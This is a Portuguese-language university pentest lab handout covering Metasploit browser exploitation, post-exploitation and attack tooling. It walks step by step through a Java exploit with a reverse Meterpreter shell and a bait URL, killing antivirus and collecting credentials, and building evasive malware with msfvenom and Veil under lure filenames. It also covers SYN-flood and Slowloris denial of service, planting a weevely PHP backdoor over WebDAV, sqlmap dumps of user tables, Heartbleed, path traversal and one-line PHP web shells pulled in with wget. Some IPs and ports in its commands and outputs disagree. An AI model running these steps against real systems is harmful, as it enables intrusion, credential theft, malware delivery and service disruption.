Você está na página 1de 19

Prof.

Sandro Melo

Este documento destina-se exclusivamente aos cursos que realizo para uso específico nas
disciplinas ministradas em cursos de Graduação e Pós Graduação, sobre temas inerentes
principalmente a Sistema Operacionais, Redes de Computadores, Segurança Computacional,
Pentest, Computação Forense e Engenharia Reversa.

Os assuntos abordados neste documento, como: técnicas, metodologias, ferramentas e


experimentos demonstrados são de pleno caráter acadêmico, com o objetivo único de informar.
Seja aplicado em aulas, palestras tradicionais (congressos, simpósios, feiras) e ou oficinas
(treinamentos, workshops, bootcamps). São também conhecimentos notórios destinados a uso
profissional por profissionais autorizados, denominados Especialista e/ou Peritos, como por
exemplos: Pentesters, Analistas e/ou Peritos em Computação Forense.

Todo conteúdo teórico e empírico descrito neste documento. representa a opinião e


conhecimento do seu autor, sendo resultado de estudos/pesquisas, não caracterizando qualquer
fornecimento de informação confidencial ou restrita das corporações de seu relacionamento.

O uso indevido de qualquer conhecimento citado aqui é de total responsabilidade de quem utilizar
como também qualquer dano causado a qualquer sistema computacional de sua propriedade ou não.

Este material não pode ser copiado ou divulgado, total ou parcialmente, sem a autorização formal
e expressa de seu autor.

As referências utilizadas são de fontes públicas e disponíveis em livros especializados ou em


sites na Internet.

Necessário destacar que outra fonte relevante são os sites de projetos de comunidade FLOSS.
Sendo relevante destacar que o Modelo Software Livre tem como princípio a segurança
fundamentada na transparência do código aberto que pode ser auditado e questionado a qualquer
momento. Códigos fruto de pesquisa que na sua maioria são oriundos em centros de pesquisas de
Universidade dos quatro cantos do planeta.

Em momento algum é uma referência definitiva, dessa forma as bibliografias indicadas e/ou
referenciadas são base para uma formação sólida e coesa.

Professor Sandro Melo – sandromelo.sec@gmail.com 1/19


Prof. Sandro Melo

LAB 40 – MSF - Metasploit Framework

Técnica:
Consiste na exploração da falha de serviços nos mais variados tipos servidores e plataforma operacional a partir de
um conceitos automatizado, por uma ferramenta que utiliza uma base conhecimento de exploração.

Ferramentas:
Nmap, Metasploit Framework com Meterpreter

Importância p/ Pen-test:
Após todo o processo de um Pentest, principalmente após Scanners de Vulnerabilidades, é importante ratificar o
quanto uma vulnerabilidade é realmente um ameaça.

OSSTMM recomenda:
Identificação de informações do S.O.
Identificação de versão da aplicações utilizadas
Identificação de Vulnerabilidades
Buscar informações que possam possibilitar o Pentester ganhar acesso

Contramedidas:
Após quantificar e qualificar os problemas o Profissional de Segurança deve aplicar todas as correções necessárias

Professor Sandro Melo – sandromelo.sec@gmail.com 2/19


Prof. Sandro Melo

1 – Execução do MSF

a) Instalacao de pre-requesisto:
# ./msfconsole

Realização de busca de exploit para exploração documentada no CVE-2013-0422:

msf > search CVE-2013-0422

Matching Modules
================

Name Disclosure Date Rank Description


---- --------------- ---- -----------
exploit/multi/browser/java_jre17_jmxbean 2013-01-10 excellent Java Applet
JMX Remote Code Execution

Parametrização do exploit para exploração da vulnerabilidade do navegado Internet Exploit 10 (IE10)


a partir da falha do modulo java:

msf > exploit/multi/browser/java_jre17_jmxbean


msf exploit(multi/browser/java_jre17_jmxbean) >

Identificação de informações dos possíveis alvos com o comandos show targets:


msf exploit(multi/browser/java_jre17_jmxbean) > show targets

Exploit targets:

Id Name
-- ----
0 Generic (Java Payload)
1 Windows x86 (Native Payload)
2 Mac OS X x86 (Native Payload)
3 Linux x86 (Native Payload)

Demais detalhes sobre o exploit selecionado com o comando show info:


msf exploit(multi/browser/java_jre17_jmxbean) > show info
Name: Java Applet JMX Remote Code Execution
Module: exploit/multi/browser/java_jre17_jmxbean
Platform: Java, Linux, OSX, Windows
Arch:

Professor Sandro Melo – sandromelo.sec@gmail.com 3/19


Prof. Sandro Melo

Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2013-01-10

References:
https://cvedetails.com/cve/CVE-2013-0422/
OSVDB (89059)
https://www.kb.cert.org/vuls/id/625617
http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-
disable.html
http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/
http://pastebin.com/cUG2ayjh
http://www.securityfocus.com/bid/45246
http://www.microsoft.com/technet/security/advisory/2488013.mspx
http://www.wooyun.org/bugs/wooyun-2010-0885
http://seclists.org/fulldisclosure/2010/Dec/110
https://technet.microsoft.com/en-us/library/security/MS11-003

Identificação as variáveis de ambientes que necessitam ser parametrizadas, do exploit e do payload


selecionado:

msf exploit(multi/browser/java_jre17_jmxbean) > show options


Module options (exploit/multi/browser/java_jre17_jmxbean):

Name Current Setting Required Description


---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be
an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default
is randomly generated)
URIPATH no The URI to use for this exploit (default is
random)

Exploit target:

Id Name
-- ----
0 Generic (Java Payload)

Exploit target:

Id Name
-- ----
0 Automatic

Professor Sandro Melo – sandromelo.sec@gmail.com 4/19


Prof. Sandro Melo

Para o exploit é sugerido parametrizar as respectivas variáveis da seguinte maneira:

SRVHOST= <ip.do.kali>
URIPATH = nome sugestivo como: promoção, grátis, free

Para o Payload selecionado, sugere-se definir:


LHOST=<ip.do.kali>
LPORT=8180

Segue exemplificação da parametrização das variáveis necessárias ao exploit selecionado:

msf exploit(multi/browser/java_jre17_jmxbean) > set SRVHOST 192.168.100.152


SRVHOST => 192.168.0.171

msf exploit(multi/browser/java_jre17_jmxbean) > set URIPATH gratis


URIPATH => gratis

Listagem do payload disponíveis com o comandos show payload:

msf exploit(multi/browser/java_jre17_jmxbean) > show payloads

Parametrização do payload Meterpreter Java com conexão baseada em shell reversa:

msf exploit(windows/browser/ms11_003_ie_css_import) > set PAYLOAD


java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp

Execução do comando show options, para visualizar novamente as configurações, validar as parametrizações
já realizada e identificar as variáveis do payload que demandam parametrização:

msf exploit(multi/browser/java_jre17_jmxbean) > show options


Module options (exploit/multi/browser/java_jre17_jmxbean):

Name Current Setting Required Description


---- --------------- -------- -----------
SRVHOST 192.168.0.171 yes The local host to listen on. This must be
an address on the local machine or 0.0.0.0
SRVPORT 8282 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default
is randomly generated)
URIPATH gratis no The URI to use for this exploit (default is
random)

Payload options (java/meterpreter/reverse_tcp):

Professor Sandro Melo – sandromelo.sec@gmail.com 5/19


Prof. Sandro Melo

Name Current Setting Required Description


---- --------------- -------- -----------
LHOST yes The listen address
LPORT yes The listen port

Exploit target:
Id Name
-- ----
0 Generic (Java Payload)

Segue exemplificação da parametrização das variáveis necessárias ao Payload selecionado:

msf exploit(multi/browser/java_jre17_jmxbean) > set LHOST 192.168.100.152


LHOST => 192.168.0.171

msf exploit(multi/browser/java_jre17_jmxbean) > set LPORT 8180


LPORT => 9876

Execução do exploit:
msf exploit(multi/browser/java_jre17_jmxbean) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.0.171:4444


msf exploit(multi/browser/java_jre17_jmxbean) > [*] Using URL:
http://0.0.0.0:3128/gratis
[*] Local IP: http://192.168.100.152:3128/gratis
[*] Server started.

Com o exploit em execução o Pentester terá que atrair o alvo de alguma forma, para acessar a url fornecida
pelo Metasploit (http://ip.do.ka.li:3128/gratis). Avaliei quais as possibilidades neste cenário:

Exemplificação da exploração, onde se destacam importantes informações, o seja que o Metasploit enviou a
informações para explorar o navegado e na sequencia uma sessão foi aberta com o Meterpreter o que indicar
total sucesso na explorar. Posteriormente outra sessão é aberta pelo Meterpreter:

Professor Sandro Melo – sandromelo.sec@gmail.com 6/19


Prof. Sandro Melo

msf exploit(multi/browser/java_jre17_jmxbean) > [*] Using URL:


http://0.0.0.0:3128/gratis
[*] Local IP: http://192.168.100.152:3128/gratis
[*] Server started.
[*] 192.168.0.13 java_jre17_jmxbean - handling request for /gratis
[*] 192.168.0.13 java_jre17_jmxbean - handling request for /gratis/
[*] 192.168.0.13 java_jre17_jmxbean - handling request for
/gratis/oviyddmu.jar
[*] 192.168.0.13 java_jre17_jmxbean - handling request for
/gratis/oviyddmu.jar
[*] Sending stage (53837 bytes) to 192.168.0.13
[*] Meterpreter session 1 opened (192.168.0.171:4444 -> 192.168.0.13:49161) at
2018-06-01 00:52:58 -0400
[*] Sending stage (179779 bytes) to 192.168.0.19
[*] Meterpreter session 1 opened (192.168.0.171:8180 -> 192.168.0.19:49163) at
2018-05-24 18:39:23 -0400

Enquanto o exploit está em execução e fornecido a informação que a página está sendo carregada o que pode
motivar o usuário a aguarda, achando que tem algum problema com a url que acessou, mas possivelmente não
motivando uma desconfiança maior sobre o que realmente está ocorrendo:

Listagem da sessões disponíveis:

msf exploit(multi/browser/java_jre17_jmxbean) > sessions -l

Professor Sandro Melo – sandromelo.sec@gmail.com 7/19


Prof. Sandro Melo

Active sessions
===============

Id Name Type Information Connection


-- ---- ---- ----------- ----------
1 meterpreter java/windows Administrator @ win8hack 192.168.0.171:4444
-> 192.168.0.13:49161 (192.168.0.13)

Para selecionar a sessão que se deseja interagir, basta usar o comando sessions seguido o número
da sessão:

msf exploit(multi/browser/java_jre17_jmxbean) > sessions 1


[*] Starting interaction with 1...

Após sucesso no comprometimento do sistema passa-se a fase de exploração, onde o objetivo de um


invasor será coletar o máximo de informações do sistema. Neste cenário o sistema comprometido foi
no nível de administrador, embora o usuário system seja o us
, basta utilizar o recurso do payload escolhido (Metepreter) o invasor pode utilizar os mais variados
recurso de exploração disponíveis tanto no Metasploit framework, entre eles os disponíveis no
payload selecionado.:

Neste cenário onde a instalação do Windows foi baseada em um único usuário que também é
administrador, uma vez comprometido o navegador, tem-se o acesso como administrador:

meterpreter > getuid


Server username: Administrator
meterpreter >

Uma das primeiras ações em um ambiente comprometido é desabilitar suas defesas, como por
exemplo buscar e matar os processo vinculados antivírus e HIPS. Essa tarefa também pode se
executada via Meterpreter executando o modulo “killav”:

meterpreter > run killav

[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.


[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...
[*] Killing off cmd.exe...
[*] Killing off cmd.exe...
[*] Killing off cmd.exe...
[*] Killing off cmd.exe...

Identificando máquina comprometida é uma é um sistema “bare metal” ou uma máquina virtual :
meterpreter > run checkvm

Professor Sandro Melo – sandromelo.sec@gmail.com 8/19


Prof. Sandro Melo

[*] Checking if target is a Virtual Machine .....


[*] This is a Sun VirtualBox Virtual Machine

Identificação de informações sobre a segurança ativa :


meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*] O seguinte comando n?o foi encontrado: firewall show opmode.
[*] Checking DEP Support Policy...

Identificação de informações sobre configuração de rede :


meterpreter > run get_local_subnets
Local subnet: 192.168.0.0/255.255.255.0

Identificação de informações gerais do sistema comprometido:


meterpreter > sysinfo
Computer : win8hack
OS : Windows 8 6.2 (x86)
Meterpreter : java/windows

Identificação de informações sobre aplicações em memória:


meterpreter > run get_application_list

Identificação de informações sobre as crendencias:


meterpreter > run credcollect

Injeção de uma DLL para execução do serviço VNC


meterpreter > run vnc

Ativação dde uma interpretador de comando:


meterpreter > shell
windir=C:\WINDOWS

Ative a shell (cmd.exe):

Professor Sandro Melo – sandromelo.sec@gmail.com 9/19


Prof. Sandro Melo

meterpreter > shell


Process 1224 created.
Channel 1 created.
Microsoft Windows [vers?o 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Todos os direitos reservados.

C:\Users\win7buguento\Desktop>

Malware – Criação via MSFvenom combinação de técnicas de Evasão

Subir Kali

Subir Win8

Gera 1o exemplo de Malware

( Exercício 1 )
# msfvenom -a x86 --platform windows -p windows/meterpreter_reverse_tcp
LHOST=192.168.100.175 LPORT=443 -f exe -o /var/www/html/BG1.exe
# ls –l /var/www/html/BG2.exe
# file /var/www/html/BG2.exe
# xxd /var/www/html/BG2.exe | head –n 2

( Exercício 2 )
Gera 2o exemplo de Malware

Consultar um encoder
# msfonsole
# search encoder
# exit

Geração de um malware formato PE


# msfvenom -a x86 --platform windows -e x86/shikata_ga_nai --i 10 -p
windows/meterpreter_reverse_tcp LHOST=192.168.100.175 LPORT=443 -f exe -o
/var/www/html/BG2.exe

# xxd /var/www/html/BG2.exe | head –n 2

PS: "Shikata ga nai (?), pronounced [xi̥ kata ɡa nai], is a Japanese language phrase meaning "nothing
can be done about it"
è

( Exercício 3 )
Gera 3o exemplo de Malware

Professor Sandro Melo – sandromelo.sec@gmail.com 10/19


Prof. Sandro Melo

# veil
list
use Evasion
list
use 2
use python/meterpreter/rev_tcp.py
generate
è foto_dr_bumbum3
use 2

( Exercício 4 )
Gera 4o exemplo de Malware
list
use python/shellcode_inject/aes_encrypt.py
generate
è foto_dr_bumbum4
use 2

( Exercício 5)
Gera 5o exemplo de Malware
list
(powershell/meterpreter/rev_https)
use 38
set LHOST ip.do.ka.li
generate
è foto_dr_bumbum5
exit
exit

# cd /var/lib/veil/output/compiled/

Suba todos no Virus total e compare os resultados.

Obs.: Para receber a conexão deve-se usar o exploit/multi/handler para receber a conexão reversa

Professor Sandro Melo – sandromelo.sec@gmail.com 11/19


Prof. Sandro Melo

DOS
1 -2 Clássico ataque Ping da Morte

# ping - s 64000 –f ip.do.al.vo

2 - Clássico ataque Synflood:

# hping3 --flood --rand-source -p 80 -S 192.168.100.230

3 – Ataque Synflood com o T50:

# t50 –help

# t50 --flood --turbo --dport 80 -S --protocol TCP 192.168.100.230

No Win2k8

# netstat -an | grep :80 | more

4 - Clássico ataque do SLOWLORIS

# tar xzvf slowloris.tar.gz –C /

# slowloris -dns [METASPLOITABLE] -port 80 -test

# slowloris -dns 192.168.100.151 -port 80 -timeout 200 -num 5000 -tcpto 5 -


httpready

No metasploitablev2

# netstat -an | grep :80 | more

Professor Sandro Melo – sandromelo.sec@gmail.com 12/19


Prof. Sandro Melo

Teste de intrusão em Aplicação Web – Exploração de Webdav - OSVDB-397

1 - Analise de Vulnerabilidades com Nikto – (Alvo Metasploitable v2)


a) Inicialize o PostgreSQL
# nikto –host http://ip.ip.ip.ip/dav -o relatorio_dav.html

b) Analise o resultado:
# Firefox relatório_dav.html

2 - Exploração do problema de segurança reportado pelo id OSVDB OSVDB-397

a) Avaliação dos recursos disponíveis:


# davtest –url http://ip.ip.ip.ip/dav

b) Avalie o resultado do relatório gerado pela ferramenta davtest:

4 - Exploração do problema de segurança reportado pelo id OSVDB OSVDB-397

a) Criação de uma pequena página web para teste no alvo


# mkdir –p /root/METAv2/html
# vim /root/xpl.html

Conteúdo do arquivo xpl.html:


<head> EXPLORACAO DO METODO PUT </head>
<title> ...::: EXPLORACAO DO METODO PUT :::... </title>
<html> <body>
<br> <br> <br>
<h1> Servidor vulneravel - metodo PUT disponivel </h1>
<h2> Servidor vulneravel - metodo PUT disponivel </h2>
<h3> Servidor vulneravel - metodo PUT disponivel </h3>
<h4> Servidor vulneravel - metodo PUT disponivel </h4>
<h5> Servidor vulneravel - metodo PUT disponivel </h5>
</body></html>

b) Instalação da ferramenta cadaver


# apt install -y cadaver

c) Execute a ferramenta cadaver sem parametros para visualizer a mensagem de ajuda com a lista
de comandos disponíveis:
# cadaver
dav:!> help

Professor Sandro Melo – sandromelo.sec@gmail.com 13/19


Prof. Sandro Melo

d) Faça a conexão com o servidor vulnerável via o recurso do webdav:


dav:!> open http://ip.ip.ip.ip/dav

e) Faça o upload da página teste via o comando PUT:


dav:!> put /root/METAv2/html/xpl.html
dav:!> quit

f) Verifique se o upload ocorreu com sucesso:


# Firefox http://ip.ip.ip.ip/dav/xpl.html

5 - Sabendo-se que o recurso WEBDAV está disponível, pode inserir Backdoors no Servidor
Web

a) Instalação da ferramenta de automação de backdoors weevely


# apt install -y weevely

b) Geração de backdoor com a linguagem PHP, obfuscada com a ferramenta weevely


# weevely generate minhasenha /root/METAv2/html/evilphp.php

c) Visualize o código da backdoor criada ferramenta weevely


# cat /root/METAv2/html/evilphp.php

d) Utilize a vulnerabilidades via comando PUT para inserir a backdoor com a ferramenta “cadaver”
# cadaver http://ip.ip.ip.ip/dav
dav:!> put /root/METAv2/html/ evilphp.php
dav:!> quit

e) Conexão a backdoor para ter acesso a uma shell


# weevely http://ip.ip.ip.ip/dav/evilphp.php minhasenha

7 - Analise de Vulnerabilidades com VEGA

a) Instasle e realize um análise de vulnerabilidade com o Vega (modo gráficO)


# apt install -y vega

b) Avalie o relatório do Vega e tente identificar áreas do site que sejam sucentíveis a ataque de SQL
Injection

8 – Avalie a possiblidade de exploração a partir de injeção SQL com o SQLMap

a) Instalação da ferramenta SQLmap

Professor Sandro Melo – sandromelo.sec@gmail.com 14/19


Prof. Sandro Melo

# apt install -y sqlmap

b) Levantamento de informações sobre o banco de dados da aplicação web


# sqlmap -u testphp.vulnweb.com --data "listproducts.php?cat=1" --level 5

c) Segunda tentativa de levamento, aumentado o nível do teste e do risco para o valor máximo:
# sqlmap -u "testphp.vulnweb.com/listproducts.php?cat=1"--level 5 --risk 3

d) Enumeração sobre contas de usuários que faz acesso ao banco de dados


sqlmap -u "testphp.vulnweb.com/listproducts.php?cat=1" --level 5 --risk 3 -
-current-user

e) Enumeração sobre privilegios do usuários que faz acesso ao banco de dados


sqlmap -u "testphp.vulnweb.com/listproducts.php?cat=1" --level 5 --risk 3 -
-privileges

f) Enumeração focada no banco de dados considerando ser um MySQL


sqlmap -u "testphp.vulnweb.com/listproducts.php?cat=1" --dbms mysql --level
5 --risk 3

g) Enumaração genérica sobre o tipo de banco de dados


sqlmap -u "testphp.vulnweb.com/listproducts.php?cat=1" --dbs --level 5 --
risk 3

h) Enumeração de informação de “banner” banco de dados considerando ser um MySQL


sqlmap -u "testphp.vulnweb.com/listproducts.php?cat=1" --level 5 --risk 3 -
-banner

i) Enumeração sobre banco de dados que em uso pela aplicação


sqlmap -u "testphp.vulnweb.com/listproducts.php?cat=1" --level 5 --risk 3 -
-current-db

j) Enumeração focado do banco de dados considerando ser um MySQL


sqlmap -u "testphp.vulnweb.com/listproducts.php?cat=1" --dbms mysql --level
5 --risk 3

l) Enumeração das tabelas que existem no banco dados alvo “information_schema”


sqlmap -u "testphp.vulnweb.com/listproducts.php?cat=1" --tables -D
information_schema

m) Enumeração das tabelas que existem no banco dados alvo “acuart”


# sqlmap -u "testphp.vulnweb.com/listproducts.php?cat=1" --columns -D
acuart -T users

Professor Sandro Melo – sandromelo.sec@gmail.com 15/19


Prof. Sandro Melo

n) Enumeração da tabelas “users” do banco dados alvo “acuart”


# sqlmap -u "testphp.vulnweb.com/listproducts.php?cat=1" -D acuart –T
users -C name,pass,email, --dump

o) Enumeração de mais informações de tabelas “users” do banco dados alvo “acuart”


# sqlmap -u "testphp.vulnweb.com/listproducts.php?cat=1" -D acuart –T
users -C name,pass,email,cart,phone,address --dump

p) Downlaod (dump) das informações das tabela “users” no banco dados alvo “acuart”
# sqlmap -u "testphp.vulnweb.com/listproducts.php?cat=1" --dump -D acuart
-T users

q) Enumeração das tabelas que existem no banco dados alvo “acuart”


sqlmap -u "testphp.vulnweb.com/listproducts.php?cat=1" --tables -D acuart

r) Realização do dump de uma tabela específica:


sqlmap -u "testphp.vulnweb.com/listproducts.php?cat=1"--columns --tables
users –D acuart

s) Realização de um dump de todo o banco de dados alvo


# sqlmap -u "testphp.vulnweb.com/listproducts.php?cat=1" --dump-all --dbms
mysql

t) Agora que tem as informações, faça o login no site com as credencias do usuário John Smith

Teste de intrusão em Aplicação Banco de Dados – Exploração de SQLi (SQL Injection)


(Alvo http://demo.testfire.net /)

9 - Analise de Vulnerabilidades com VEGA

a) Execute um varredura de vulnerabilidade e avalie o relatório do Vega e tente identificar áreas do


site que sejam sucentíveis a ataque de SQL Injection

10 – Avalie a possiblidade de exploração a partir de injeção SQL com o SQLMap

a) Levantamento de informações sobre o banco de dados da aplicação web


# sqlmap -u demo.testfire.net/bank/login.aspx --data
"uid=test&passw=pass&btnSubmit=Login" --level 5

b) Segunda tentativa de levamento, aumentado o nível do teste e do risco para o valor máximo:
# sqlmap -u demo.testfire.net/bank/login.aspx --data
"uid=test&passw=pass&btnSubmit=Login" --level 5 --risk 3

Professor Sandro Melo – sandromelo.sec@gmail.com 16/19


Prof. Sandro Melo

c) Enumaração genérica sobre o tipo de banco de dados


sqlmap -u demo.testfire.net/bank/login.aspx –data
"uid=test&passw=pass&btnSubmit=Login" --dbs --level 5 --risk 3

d) Enumeração focado do banco de dados considerando ser um Microsoft SQL


sqlmap -u demo.testfire.net/bank/login.aspx --data
"uid=test&passw=pass&btnSubmit=Login" --dbms mssql --level 5 --risk 3

e) Enumeração das tabelas que existem no banco dados alvo


sqlmap -u demo.testfire.net/bank/login.aspx --
data"uid=test&passw=pass&btnSubmit=Login" --tables -D <NOME DO BANCO>

f) Realização do dump de uma tabela específica:


sqlmap -u demo.testfire.net/bank/login.aspx –data
"uid=test&passw=pass&btnSubmit=Login" --columns --tables <nome da tabela> –
D <NOME DO BANCO>

g) Realização de um dump de todo o banco de dados alvo


# sqlmap -u demo.testfire.net/bank/login.aspx --data
"uid=test&passw=pass&btnSubmit=Login" --dump-all –dbms mssql

10 – Exploração do clássico bug HEARTBLEED:

Inicialize o Windows Server 2k8, apos realizar o login inicialize o serviço WAMP Server:
# tar xzvf heartbleet.tar.gz –C /

# chmod +x /usr/bin/heartbleet.py

#heartbleet.py -v -p 4443 192.168.0.230

(Acessar https://192.168.100.230:4443/dvwa/login.php e tentar autenticar)

# heartbleet.py -v -p 4443 192.168.0.230

Professor Sandro Melo – sandromelo.sec@gmail.com 17/19


Prof. Sandro Melo

### 03 DIRECTORY TRANSVERSAL METASPLOITABLEv2

via browser l
http://[IP-METAv3]/mutillidae/index.php?page=../../../../../../etc/passwd

METASPLOTLABEv2 (Mutillidae)

Injecção de comandos (Core Controls)

/var/www/html/

# vim /var/www/html/sys.php

<?php echo shell_exec($_GET['e']); ?>

# vim /var/www/html/cmd.php

Professor Sandro Melo – sandromelo.sec@gmail.com 18/19


Prof. Sandro Melo

<?php passthru($CMD); ?>

http://127.0.0.1/sys.php?e=whoami

Ative um servidor sem suporte a PHP no Kali

localhost ; wget http:// 192.168.0.171/sys.php


localhost ; wget http://192.168.0.171/cmd.php

http://192.168.100.154/mutillidae/sys.php?e=ls

Professor Sandro Melo – sandromelo.sec@gmail.com 19/19

Você também pode gostar